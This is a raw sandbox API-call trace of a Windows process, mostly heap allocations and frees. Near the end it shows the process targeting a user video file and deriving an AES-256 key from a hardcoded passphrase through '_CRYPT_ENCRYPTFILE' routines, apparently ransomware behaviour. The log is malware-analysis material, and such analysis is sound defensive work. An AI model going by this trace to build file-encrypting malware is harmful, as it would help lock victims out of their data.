RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0100.235] FreeLibrary (hLibModule=0x772d0000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0100.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.236] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.236] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.236] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0100.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0100.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0100.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9f38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0100.239] CloseHandle (hObject=0x298) returned 1 [0100.239] FreeLibrary (hLibModule=0x772d0000) returned 1 [0100.239] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0100.239] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a712c0, ftCreationTime.dwHighDateTime=0x1d5e934, ftLastAccessTime.dwLowDateTime=0x5c377970, ftLastAccessTime.dwHighDateTime=0x1d5e278, ftLastWriteTime.dwLowDateTime=0x5c377970, ftLastWriteTime.dwHighDateTime=0x1d5e278, nFileSizeHigh=0x0, nFileSizeLow=0x18f4f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="rggg9G4RHZvsA0kg01.flv", cAlternateFileName="RGGG9G~1.FLV")) returned 0x41ac2c0 [0100.239] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0100.239] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0100.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0100.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0100.240] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0100.240] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0100.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.240] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0100.240] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.240] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.241] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0100.241] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0100.241] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0100.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0100.241] CryptHashData (hHash=0x41ac700, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0100.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.241] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca760, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0100.242] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac740) returned 1 [0100.242] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.242] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0100.242] CryptDestroyHash (hHash=0x41ac700) returned 1 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, 